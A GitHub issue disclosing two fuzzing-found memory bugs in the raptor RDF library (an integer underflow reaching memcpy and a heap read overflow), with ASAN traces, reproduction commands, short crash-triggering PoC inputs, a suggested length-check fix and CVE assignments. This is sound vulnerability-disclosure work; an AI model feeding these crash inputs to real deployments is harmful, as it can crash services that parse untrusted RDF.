
Heap read overflow and integer overflow in memcpy #70

Open
pedrib opened this issue Dec 27, 2024 · 2 comments

Comments


pedrib commented Dec 27, 2024

Hi,

I reported these issues in the Debian bug tracker a few months ago:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067896

I've also pushed an update to my repo about them:
https://github.com/pedrib/PoC/blob/master/fuzzing/raptor-fuzz.md

Pasting here what I posted there:

1. Integer Underflow in raptor_uri_normalize_path()

There's an integer underflow in a path length calculation in
raptor_uri_normalize_path().

This can be triggered by running the PoC below:

utils/rapper -i turtle memcpy_int_underflow.poc
rapper: Parsing URI file:///memcpy_int_underflow.poc with parser turtle
rapper: Serializing with serializer ntriples
free(): invalid pointer
Aborted

With an ASAN build of rapper we can more clearly see the issue without
the need of a debugger:

raptor-asan/utils/rapper -i turtle memcpy_int_underflow.poc
rapper: Parsing URI file:///memcpy_int_underflow.poc with parser turtle
rapper: Serializing with serializer ntriples
=================================================================
==2406522==ERROR: AddressSanitizer: negative-size-param: (size=-5)
    #0 0x5f90a3e1cf33 in __interceptor_memcpy (/raptor/raptor-asan/utils/.libs/rapper+0x3cf33) (BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #1 0x7c902fa96e5a in raptor_uri_resolve_uri_reference (/raptor/raptor/src/.libs/libraptor2.so.0+0x19e5a) (BuildId: 9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #2 0x7c902fa9741c in raptor_new_uri_relative_to_base_counted (/raptor/raptor/src/.libs/libraptor2.so.0+0x1a41c) (BuildId: 9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #3 0x7c902fa9747a in raptor_new_uri_relative_to_base (/raptor/raptor/src/.libs/libraptor2.so.0+0x1a47a) (BuildId: 9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #4 0x7c902fab93fc in turtle_lexer_lex (/raptor/raptor/src/.libs/libraptor2.so.0+0x3c3fc) (BuildId: 9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #5 0x7c902fabc3ec in turtle_parser_parse (/raptor/raptor/src/.libs/libraptor2.so.0+0x3f3ec) (BuildId: 9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #6 0x7c902fabebb9 in turtle_parse turtle_parser.c
    #7 0x7c902fabf3ff in raptor_turtle_parse_chunk turtle_parser.c
    #8 0x7c902fa92de4 in raptor_parser_parse_chunk (/raptor/raptor/src/.libs/libraptor2.so.0+0x15de4) (BuildId: 9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #9 0x7c902fa92fc1 in raptor_parser_parse_file_stream (/raptor/raptor/src/.libs/libraptor2.so.0+0x15fc1) (BuildId: 9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #10 0x7c902fa93174 in raptor_parser_parse_file (/raptor/raptor/src/.libs/libraptor2.so.0+0x16174) (BuildId: 9edf75a105deaf007b9332b0a0367c8ad4af744d)
    #11 0x5f90a3ed9492 in main (/raptor/raptor-asan/utils/.libs/rapper+0xf9492) (BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #12 0x7c902f7816c9 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #13 0x7c902f781784 in __libc_start_main csu/../csu/libc-start.c:360:3
    #14 0x5f90a3e01650 in _start (/raptor/raptor-asan/utils/.libs/rapper+0x21650) (BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be)

(...)

SUMMARY: AddressSanitizer: negative-size-param (/raptor/raptor-asan/utils/.libs/rapper+0x3cf33) (BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be) in __interceptor_memcpy
==2406522==ABORTING

The crash occurs because raptor_uri_normalize_path(), which does some
complicated jiggling to normalize paths, fails to take integer underflows
into account. The function will not be shown here as it is quite complex.

The fix, however, is rather simple!
The function contains several of these checks after each calculation:

#if defined(RAPTOR_DEBUG)
  if(path_len != strlen((const char*)path_buffer))
    RAPTOR_FATAL3("Path length %ld does not match calculated %ld.", (long)strlen((const char*)path_buffer), (long)path_len);
#endif

By removing the ifdefs around the RAPTOR_FATAL calls, we can catch and
prevent this bug, as running the PoC results in:
raptor_rfc2396.c:399:raptor_uri_normalize_path: fatal error: Path length 0 does not match calculated -5.
Aborted

1.1 Steps to reproduce

rapper -i turtle memcpy_int_underflow.poc

Contents of memcpy_int_underflow.poc:

@base <http:o/www.w3.org/2001/sw/DataA#cess/df1.ttl> .
@prefix bdf: <.&/../?D/../../1999/02/22-rdf-syntax-ns#>/dbpe

2. Heap read buffer overflow in raptor_ntriples_parse_term_internal()

Sorry, I didn't have much time to analyse this; here's the full ASAN output:

raptor-asan/utils/rapper -i nquads heap_read_overflow.poc
rapper: Parsing URI file:///heap_read_overflow.poc with parser nquads
rapper: Serializing with serializer ntriples
=================================================================
==2449874==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000004d6f at pc 0x70f0eec00a68 bp 0x7ffecb914e50 sp 0x7ffecb914e48
READ of size 1 at 0x602000004d6f thread T0
    #0 0x70f0eec00a67 in raptor_ntriples_parse_term_internal raptor_ntriples.c
    #1 0x70f0eebfffc8 in raptor_ntriples_parse_term (/raptor-asan/src/.libs/libraptor2.so.0+0x8cfc8) (BuildId: 2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #2 0x70f0eec37fa1 in raptor_ntriples_parse_line ntriples_parse.c
    #3 0x70f0eec36782 in raptor_ntriples_parse_chunk ntriples_parse.c
    #4 0x70f0eeba9486 in raptor_parser_parse_chunk (/raptor-asan/src/.libs/libraptor2.so.0+0x36486) (BuildId: 2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #5 0x70f0eeba96b6 in raptor_parser_parse_file_stream (/raptor-asan/src/.libs/libraptor2.so.0+0x366b6) (BuildId: 2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #6 0x70f0eeba9aac in raptor_parser_parse_file (/raptor-asan/src/.libs/libraptor2.so.0+0x36aac) (BuildId: 2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #7 0x5f25d7d8e492 in main (/raptor-asan/utils/.libs/rapper+0xf9492) (BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #8 0x70f0ee8776c9 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #9 0x70f0ee877784 in __libc_start_main csu/../csu/libc-start.c:360:3
    #10 0x5f25d7cb6650 in _start (/raptor-asan/utils/.libs/rapper+0x21650) (BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be)

0x602000004d6f is located 1 bytes before 16-byte region [0x602000004d70,0x602000004d80)
allocated by thread T0 here:
    #0 0x5f25d7d5047e in malloc (/raptor-asan/utils/.libs/rapper+0xbb47e) (BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #1 0x70f0eec35c4b in raptor_ntriples_parse_chunk ntriples_parse.c
    #2 0x70f0eeba9486 in raptor_parser_parse_chunk (/raptor-asan/src/.libs/libraptor2.so.0+0x36486) (BuildId: 2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #3 0x70f0eeba96b6 in raptor_parser_parse_file_stream (/raptor-asan/src/.libs/libraptor2.so.0+0x366b6) (BuildId: 2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #4 0x70f0eeba9aac in raptor_parser_parse_file (/raptor-asan/src/.libs/libraptor2.so.0+0x36aac) (BuildId: 2591e3251613881bd804fabbc6c02dd6e7b7b76e)
    #5 0x5f25d7d8e492 in main (/raptor-asan/utils/.libs/rapper+0xf9492) (BuildId: 31b11a035fdbbfb23ddb7c1a5db60302956622be)
    #6 0x70f0ee8776c9 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow raptor_ntriples.c in raptor_ntriples_parse_term_internal
==2449874==ABORTING

2.1 Steps to reproduce

rapper -i nquads heap_read_overflow.poc

Contents of heap_read_overflow.poc:

_:/exaple/o
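As an added illustration of the fix described in issue 1 (this is not raptor's code and not from the report), here is a small C path normalizer that keeps an explicit length counter the way the library does and runs the report's length-vs-strlen check unconditionally after every step instead of only under RAPTOR_DEBUG; the names path_len_consistent and normalize_path_checked, the 256-byte bound and the absolute-path-only restriction are assumptions made for this example.

```c
#include <string.h>

/* Always-on version of the RAPTOR_DEBUG check quoted in the report: the
 * tracked length must be non-negative and equal to strlen() of the buffer.
 * A negative long handed to memcpy is converted to a huge size_t, which is
 * what ASAN reported as negative-size-param (size=-5). */
int path_len_consistent(const char *path_buffer, long path_len) {
    return path_len >= 0 && (size_t)path_len == strlen(path_buffer);
}

/* Resolve "." and ".." segments of an absolute path (RFC 3986 5.2.4 style).
 * Keeps an explicit length counter, as the library does, but re-validates
 * it against the buffer after every segment instead of trusting the
 * arithmetic. Returns the new length, or -1 on bad input or if the
 * invariant breaks, so a caller never reaches memcpy with a bogus size. */
long normalize_path_checked(char *path) {
    char tmp[256];                    /* assumed bound for this example */
    long out_len = 0;                 /* bytes written to tmp so far */
    const char *seg = path;
    if (*seg != '/' || strlen(path) >= sizeof tmp)
        return -1;                    /* only bounded absolute paths handled */
    tmp[0] = '\0';
    while (*seg == '/') {
        const char *end = strchr(seg + 1, '/');   /* start of next segment */
        size_t seg_len = end ? (size_t)(end - seg) : strlen(seg);
        int dot = 0;                  /* segment was "." or ".." */
        if (seg_len == 2 && seg[1] == '.') {
            dot = 1;                  /* "/.": drop it */
        } else if (seg_len == 3 && seg[1] == '.' && seg[2] == '.') {
            char *prev = strrchr(tmp, '/');   /* "/..": pop previous segment */
            dot = 1;
            if (prev) { *prev = '\0'; out_len = prev - tmp; }
            /* at the root nothing is popped; out_len never drops below 0 */
        } else {
            memcpy(tmp + out_len, seg, seg_len);
            out_len += (long)seg_len;
            tmp[out_len] = '\0';
        }
        if (dot && !end) {            /* trailing "/." or "/.." leaves a "/" */
            tmp[out_len++] = '/';
            tmp[out_len] = '\0';
        }
        if (!path_len_consistent(tmp, out_len))
            return -1;                /* same condition as the RAPTOR_FATAL3 */
        seg = end ? end : seg + seg_len;
    }
    memcpy(path, tmp, (size_t)out_len + 1);
    return out_len;
}
```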

carnil commented Jan 11, 2025

Two CVEs were assigned for these issues: CVE-2024-57822 and CVE-2024-57823

Owner

dajobe commented Jan 16, 2025

Thanks for reporting here with small examples that trigger it.
